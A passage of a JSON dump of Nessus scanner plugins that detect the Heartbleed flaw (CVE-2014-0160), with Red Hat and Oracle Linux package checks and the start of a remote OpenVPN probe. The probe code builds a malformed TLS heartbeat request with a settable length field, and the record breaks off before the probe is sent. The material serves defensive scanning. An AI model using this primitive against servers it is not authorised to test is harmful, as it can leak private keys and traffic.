pkg:\"openssl>=1.0.1<1.0.1_10\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mingw32-openssl>=1.0.1<1.0.1g\")) flag++;\n\nif (flag)\n{\n  if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n  else security_hole(0);\n  exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n",
            "cvss": {
                "score": 9.4,
                "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"
            }
        },
        {
            "lastseen": "2021-01-17T13:14:14",
            "description": "Updated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.",
            "edition": 20,
            "published": "2014-04-08T00:00:00",
            "title": "RHEL 6 : openssl (RHSA-2014:0376)",
            "type": "nessus",
            "bulletinFamily": "scanner",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2014-04-08T00:00:00",
            "cpe": [
                "p-cpe:/a:redhat:enterprise_linux:openssl-static",
                "cpe:/o:redhat:enterprise_linux:6.5",
                "p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo",
                "p-cpe:/a:redhat:enterprise_linux:openssl-perl",
                "p-cpe:/a:redhat:enterprise_linux:openssl",
                "cpe:/o:redhat:enterprise_linux:6",
                "p-cpe:/a:redhat:enterprise_linux:openssl-devel"
            ],
            "id": "REDHAT-RHSA-2014-0376.NASL",
            "href": "https://www.tenable.com/plugins/nessus/73396",
            "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were  \n# extracted from Red Hat Security Advisory RHSA-2014:0376. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n  script_id(73396);\n  script_version(\"1.12\");\n  script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n  script_cve_id(\"CVE-2014-0160\");\n  script_xref(name:\"RHSA\", value:\"2014:0376\");\n\n  script_name(english:\"RHEL 6 : openssl (RHSA-2014:0376)\");\n  script_summary(english:\"Checks rpm output for the updated packages\");\n\n  script_set_attribute(\n    attribute:\"synopsis\", \n    value:\"The remote Red Hat host is missing one or more security updates.\"\n  );\n  script_set_attribute(\n    attribute:\"description\", \n    value:\n\"Updated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\"\n  );\n  script_set_attribute(\n    attribute:\"see_also\",\n    value:\"https://www.redhat.com/security/data/cve/CVE-2014-0160.html\"\n  );\n  script_set_attribute(\n    attribute:\"see_also\",\n    value:\"http://rhn.redhat.com/errata/RHSA-2014-0376.html\"\n  );\n  script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n  script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n  script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n  script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n  script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n  script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n  script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n  script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n  script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl\");\n  script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo\");\n  script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-devel\");\n  script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-perl\");\n  script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-static\");\n  script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n  script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n  script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n  script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n  script_end_attributes();\n\n  script_category(ACT_GATHER_INFO);\n  script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n  script_family(english:\"Red Hat Local Security Checks\");\n\n  script_dependencies(\"ssh_get_info.nasl\");\n  script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n  exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"openssl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"openssl-debuginfo-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"openssl-devel-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\n\n\nif (flag)\n{\n  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n  else security_hole(0);\n  exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n",
            "cvss": {
                "score": 9.4,
                "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"
            }
        },
        {
            "lastseen": "2021-01-17T12:48:53",
            "description": "From Red Hat Security Advisory 2014:0376 :\n\nUpdated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.",
            "edition": 20,
            "published": "2014-04-08T00:00:00",
            "title": "Oracle Linux 6 : openssl (ELSA-2014-0376)",
            "type": "nessus",
            "bulletinFamily": "scanner",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2014-04-08T00:00:00",
            "cpe": [
                "cpe:/o:oracle:linux:6",
                "p-cpe:/a:oracle:linux:openssl-devel",
                "p-cpe:/a:oracle:linux:openssl",
                "p-cpe:/a:oracle:linux:openssl-static",
                "p-cpe:/a:oracle:linux:openssl-perl"
            ],
            "id": "ORACLELINUX_ELSA-2014-0376.NASL",
            "href": "https://www.tenable.com/plugins/nessus/73395",
            "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:0376 and \n# Oracle Linux Security Advisory ELSA-2014-0376 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n  script_id(73395);\n  script_version(\"1.10\");\n  script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n  script_cve_id(\"CVE-2014-0160\");\n  script_xref(name:\"RHSA\", value:\"2014:0376\");\n\n  script_name(english:\"Oracle Linux 6 : openssl (ELSA-2014-0376)\");\n  script_summary(english:\"Checks rpm output for the updated packages\");\n\n  script_set_attribute(\n    attribute:\"synopsis\", \n    value:\"The remote Oracle Linux host is missing one or more security updates.\"\n  );\n  script_set_attribute(\n    attribute:\"description\", \n    value:\n\"From Red Hat Security Advisory 2014:0376 :\n\nUpdated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\"\n  );\n  script_set_attribute(\n    attribute:\"see_also\",\n    value:\"https://oss.oracle.com/pipermail/el-errata/2014-April/004065.html\"\n  );\n  script_set_attribute(\n    attribute:\"solution\", \n    value:\"Update the affected openssl packages.\"\n  );\n  script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n  script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n  script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n  script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n  script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n  script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n  script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n  script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl\");\n  script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-devel\");\n  script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-perl\");\n  script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-static\");\n  script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n  script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n  script_end_attributes();\n\n  script_category(ACT_GATHER_INFO);\n  script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n  script_family(english:\"Oracle Linux Local Security Checks\");\n\n  script_dependencies(\"ssh_get_info.nasl\");\n  script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n  exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"openssl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssl-devel-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\n\n\nif (flag)\n{\n  report = rpm_report_get();\n\n  if(!egrep(pattern:\"package installed.+openssl[^0-9]*\\-1\\.0\\.1\", string:report)) exit(0, \"The remote host does not use OpenSSL 1.0.1\");\n\n  if (report_verbosity > 0) security_hole(port:0, extra:report);\n  else security_hole(0);\n  exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n",
            "cvss": {
                "score": 9.4,
                "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"
            }
        },
        {
            "lastseen": "2021-04-01T04:55:24",
            "description": "Based on its response to a TLS request with a specially crafted\nheartbeat message (RFC 6520), the remote OpenVPN service appears to be\naffected by an out-of-bounds read flaw.\n\nBecause the remote OpenVPN service does not employ the 'HMAC Firewall'\nfeature, this vulnerability can be exploited without authentication.\n\nThis vulnerability could allow an attacker to obtain secret keys,\ncleartext VPN traffic, and other sensitive data.",
            "edition": 28,
            "published": "2014-04-14T00:00:00",
            "title": "OpenVPN Heartbeat Information Disclosure (Heartbleed)",
            "type": "nessus",
            "bulletinFamily": "scanner",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2021-04-02T00:00:00",
            "cpe": [
                "cpe:/a:openvpn:openvpn"
            ],
            "id": "OPENVPN_HEARTBLEED.NASL",
            "href": "https://www.tenable.com/plugins/nessus/73491",
            "sourceData": "#TRUSTED 8e76757de21630cd19e1142a6014f3b3276a17509243f085e6b515b320452fed2fce468716cc1c98dfc8c810a8c4319461b7fcf5b5da7213f485b30120f2f8b0bf19ba37d9b0a1f5601f0705572cd6dfcff55bc7ba0064ef06f29e13bac938fa7abf25fea721670a33b173e7a79424f2928ac006421439b289b18b8befe12989a5d13ff4cf9b45837c92d92b6c4e76a1e67d98a2b784dfe836ed04de48e59c02c4c69956d713b840a77734c1d5074321e6b6c6b94eb43dffb9ef480ae9f9e194274bf5c59e9d4cd693009c0d9629941302462082a42535ae4cb01b5879e9a0c4fd5149a931670c3f6376a1b58119488d95056a00a2c2a60dd0b923a39fd41121e2f9fae6ac5874be608689097af5081841ab9896fefc2cfeef79c5cf0853984367a405a40cd5f7de8b3aa2b28e9e6cb928e44e1f90c8e308ae0b9f35212b71cd0462f3c587ddfbc4bfb6d7d03a0e81b759725cf49a0496ebfdf45f9074104462cc561d3fe995d558e520a32b4c5d1f392df3ce38587128887191d5f88ec7fed10adaf0652318bd1ed0f7f528ed8fb47225e4e31fff64c79c28867ff45d9360132812ca0a2793234e6f59ab0d05d8348f4c439840d6fb847a028c424e816f432cf3e6ac76a191b3d2c8f53fea8028719654bcb82aa84cfe8d5c0b73f4647b9417d80719e0699a201f00e1c0c839fa05b7dea3a1f576ea16dcf3a2c7c8bf27ba8a\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n  script_id(73491);\n  script_version(\"1.14\");\n  script_cvs_date(\"Date: 2019/11/26\");\n\n  script_cve_id(\"CVE-2014-0160\");\n  script_bugtraq_id(66690);\n  script_xref(name:\"CERT\", value:\"720951\");\n  script_xref(name:\"EDB-ID\", value:\"32745\");\n  script_xref(name:\"EDB-ID\", value:\"32764\");\n  script_xref(name:\"EDB-ID\", value:\"32791\");\n  script_xref(name:\"EDB-ID\", value:\"32998\");\n\n  script_name(english:\"OpenVPN Heartbeat Information Disclosure (Heartbleed)\");\n  script_summary(english:\"Checks if the OpenVPN server incorrectly handles a malformed TLS heartbeat message\");\n\n  script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by an information disclosure\nvulnerability.\");\n  script_set_attribute(attribute:\"description\", value:\n\"Based on its response to a TLS request with a specially crafted\nheartbeat message (RFC 6520), the remote OpenVPN service appears to be\naffected by an out-of-bounds read flaw.\n\nBecause the remote OpenVPN service does not employ the 'HMAC Firewall'\nfeature, this vulnerability can be exploited without authentication.\n\nThis vulnerability could allow an attacker to obtain secret keys,\ncleartext VPN traffic, and other sensitive data.\");\n  script_set_attribute(attribute:\"see_also\", value:\"http://heartbleed.com/\");\n  script_set_attribute(attribute:\"see_also\", value:\"http://eprint.iacr.org/2014/140\");\n  script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n  script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n  script_set_attribute(attribute:\"see_also\", value:\"https://community.openvpn.net/openvpn/wiki/heartbleed\");\n  script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the version of OpenSSL that OpenVPN is linked against to\n1.0.1g or later. Alternatively, recompile OpenSSL with the\n'-DOPENSSL_NO_HEARTBEATS' flag to disable the vulnerable\nfunctionality. For Windows servers, upgrade to OpenVPN version\n2.3.2-I004 or later.\");\n  script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n  script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n  script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n  script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n  script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n  script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n  script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat (Heartbleed) Information Leak');\n  script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n  script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n  script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n  script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/07\");\n  script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/14\");\n\n  script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n  script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openvpn:openvpn\");\n  script_end_attributes();\n\n  script_category(ACT_ATTACK);\n  script_family(english:\"Misc.\");\n\n  script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n  script_dependencies(\"openvpn_detect.nasl\");\n\n  exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"dump.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"ssl_funcs.inc\");\ninclude(\"data_protection.inc\");\n\n#\n# @remark RFC 6520\n#\n\nfunction heartbeat_ext()\n{\n  local_var mode;\n\n  mode = _FCT_ANON_ARGS[0];\n  if (isnull(mode))\n    mode = 1; #  peer allowed to send requests\n\n  return    mkword(15)  +  # extension type\n            mkword(1)   +  # extension length\n            mkbyte(mode);  # hearbeat mode\n}\n\nfunction heartbeat_req(payload, plen, pad)\n{\n  local_var req;\n\n  if (isnull(plen))\n    plen = strlen(payload);\n\n  req = mkbyte(1) +       # HeartbeatMessageType: request\n        mkword(plen) +    # payload length\n        payload +         # payload\n        pad;              # random padding\n\n  return req;\n\n}\n\n#\n# OpenVPN packet protocol code\n#\n\n# Lower 3 bits is the key id; higher 5 bits is the opcode\nP_KEY_ID_MASK                  = 0x07;\nP_OPCODE_SHIFT                 = 3;\n\n# initial key from client, forget previous state\nP_CONTROL_HARD_RESET_CLIENT_V1  = 1;\n\n# initial key from server, forget previous state\nP_CONTROL_HARD_RESET_SERVER_V1  = 2;\n\n# new key, graceful transition from old to new key\nP_CONTROL_SOFT_RESET_V1         = 3;\n\n# control channel packet (usually TLS ciphertext)\nP_CONTROL_V1                    = 4;\n\n# acknowledgement for packets received\nP_ACK_V1                        = 5;\n\n# data channel packet\nP_DATA_V1                       = 6;\n\n# indicates key_method >= 2\n# initial key from client, forget previous state\nP_CONTROL_HARD_RESET_CLIENT_V2  = 7;\n\n# initial key from server, forget previous state\nP_CONTROL_HARD_RESET_SERVER_V2  = 8;\n\n# define the range of legal opcodes\nP_FIRST_OPCODE                  = 1;\nP_LAST_OPCODE                   = 8;\n\nglobal_var _ovpn, _tls;\n\nfunction _randbytes()\n{\n  local_var i, len, out;\n\n  len =_FCT_ANON_ARGS[0];\n\n  out = NULL;\n  for(i = 0; i < len; i++)\n    out += raw_string(rand() % 256);\n\n  return out;\n}\n\nfunction _bound_check()\n{\n  local_var b, p, l;\n\n  b = _FCT_ANON_ARGS[0];\n  p = _FCT_ANON_ARGS[1];\n  l = _FCT_ANON_ARGS[2];\n\n  if (p + l <= strlen(b)) return TRUE;\n  return FALSE;\n}\n\nfunction ovpn_init(port, timeout, proto)\n{\n  _ovpn['port'] = port;\n  _ovpn['clt_sid']  = _randbytes(8);\n  _ovpn['srv_sid'] = NULL;\n  _ovpn['pkt_id']     = 0;  # our pkt_id\n  _ovpn['ack']        = make_list(); # Received packets to be ACKed\n  _ovpn['proto']      = tolower(proto);\n\n  if (isnull(timeout)) timeout = 5;\n  _ovpn['timeout']    = timeout;\n\n}\n\nfunction ovpn_set_error()\n{\n  local_var err, ret;\n\n  err = _FCT_ANON_ARGS[0];\n  ret = _FCT_ANON_ARGS[1];\n\n  _ovpn['errmsg'] = err;\n\n  return ret;\n}\n\nfunction ovpn_get_last_error()\n{\n  return _ovpn['errmsg'];\n}\n\nfunction ovpn_get_port()\n{\n  return _ovpn['port'];\n}\n\nfunction ovpn_open_sock()\n{\n  local_var port, sock;\n\n  port = ovpn_get_port();\n  if (! port)\n    return ovpn_set_error('No OpenVPN port specified.', FALSE);\n\n  if (_ovpn['proto'] == 'udp')\n    sock = open_sock_udp(port);\n  else\n    sock = open_sock_tcp(port);\n\n  if (sock)\n  {\n    _ovpn['sock'] = sock;\n    return TRUE;\n  }\n  else return ovpn_set_error('Failed to open socket on port '+port, FALSE);\n}\n\nfunction ovpn_close()\n{\n  if (_ovpn['sock']) close(_ovpn['sock']);\n}\n\nfunction ovpn_read()\n{\n  local_var data, sock, timeout, len;\n\n  sock = _ovpn['sock'];\n  if (! sock)\n    return ovpn_set_error('Socket not open.', NULL);\n\n  timeout = _ovpn['timeout'];\n\n  len = 4096;\n  if (_ovpn['proto'] == 'tcp')\n    len = getword(blob:recv(socket:sock, min:2, length:2, timeout:timeout), pos:0);\n\n  data = recv(socket:sock, min:len, length:len, timeout:timeout);\n\n  if (isnull(data))\n    return ovpn_set_error('Failed to read data from transport layer.', NULL);\n\n  return data;\n}\n\nfunction ovpn_write(data)\n{\n  local_var sock;\n\n  sock = _ovpn['sock'];\n  if (! sock)\n    return ovpn_set_error('Socket not open.', NULL);\n\n  if (_ovpn['proto'] == 'tcp')\n    data = mkword(strlen(data)) + data;\n\n  send(socket:sock, data:data);\n}\n\nfunction ovpn_rel_read(len)\n{\n  local_var ack, ack_list, data, opcode, pkt, ret, indata;\n\n  indata = NULL;\n  data = NULL;\n  while(TRUE)\n  {\n    # Requested data in buf\n    if (strlen(indata) >= len)\n    {\n      data = substr(indata, 0 , len -1);\n      indata -= data;\n\n      return data;\n    }\n\n    # Read packet from network\n    pkt = ovpn_read();\n    if (isnull(pkt)) break;\n\n    # Parse packet\n    ret = ovpn_parse_pkt(pkt:pkt);\n    if (isnull(ret)) break;\n\n    # Get ACK record\n    ack_list = ret['ack-list'];\n    foreach ack (ack_list)\n    {\n      # sent pkt ACKed\n      if (ack == _ovpn['pkt_id'])\n        _ovpn['pkt_id']++;\n    }\n\n    opcode = ret['opcode'];\n\n    if (opcode == P_CONTROL_V1)\n    {\n      indata += ret['data'];\n    }\n\n    if (!isnull(ret['pkt_id']))\n    {\n      pkt = ovpn_mk_pkt(opcode:P_ACK_V1, ack_list:make_list(ret['pkt_id']));\n      ovpn_write(data:pkt);\n    }\n  }\n\n  return indata;\n\n}\n\nfunction ovpn_parse_pkt(pkt)\n{\n  local_var ack, i, list, n, opcode, plen, pos, ret;\n\n  plen = strlen(pkt);\n\n  # len check\n  if (plen < 10)\n    return ovpn_set_error('Packet too short.', NULL);\n\n  opcode = ord(pkt[0]) >> P_OPCODE_SHIFT;\n\n  ret['opcode'] = opcode;\n  ret['key_id'] = ord(pkt[0]) & P_KEY_ID_MASK;\n\n  # Send session id\n  ret['srv_sid'] = substr(pkt, 1, 8);\n\n  #\n  # Skip HMAC and pkt_id for replay protection as we don't use --tls-auth\n  #\n\n  #\n  # Process ack record\n  #\n  ack = NULL;\n  # Number of acknowledgements\n  n = ord(pkt[9]);\n\n  pos = 10;\n  if (n)\n  {\n    if ( _bound_check(pkt, pos, n * 4 + 8))\n    {\n      # Array of pkt-ids in the ack\n      list = NULL;\n      for (i = 0; i < n ; i++)\n      {\n        list[i] = getdword(blob:pkt, pos:pos);\n        pos += 4;\n      }\n\n      # Client session id\n      ret['clt_sid'] = substr(pkt, pos, pos + 7);\n      pos += 8;\n    }\n    else return ovpn_set_error('ACK record not found in packet.', NULL);\n  }\n\n  ret['ack-list'] = list;\n\n  # We only deal with:\n  #   P_CONTROL_HARD_RESET_SERVER_V2\n  #   P_CONTROL_V1\n  #   P_ACK_V1\n\n  if (opcode == P_CONTROL_HARD_RESET_SERVER_V2)\n  {\n    # seqnum of the server\n    ret['pkt_id'] = getdword(blob:pkt, pos:pos);\n    if (isnull(ret['pkt_id']))\n      return ovpn_set_error('Failed to get message packet-id in P_CONTROL_HARD_RESET_SERVER_V1', NULL);\n\n    # Store server session id\n    _ovpn['srv_sid'] = ret['srv_sid'];\n  }\n  else if (opcode == P_CONTROL_V1)\n  {\n    # seqnum of the server\n    ret['pkt_id'] = getdword(blob:pkt, pos:pos);\n    if (isnull(ret['pkt_id']))\n      return ovpn_set_error('Failed to get message packet-id in P_CONTROL_V1', NULL);\n    pos += 4;\n\n    # TLS payload\n    if (pos < plen)\n    {\n      ret['data'] = substr(pkt, pos);\n    }\n    else return ovpn_set_error('Failed to get TLS data in P_CONTROL_V1', NULL);\n  }\n  else if (opcode == P_ACK_V1)\n  {\n    # No addditional data in P_ACK_V1\n  }\n\n  return ret;\n\n}\n\n# Create an OpenVPN packet\nfunction ovpn_mk_pkt(opcode, ack_list, data)\n{\n  local_var ack, ack_rec, clt_sid, n, pkt, pkt_id, srv_sid;\n\n  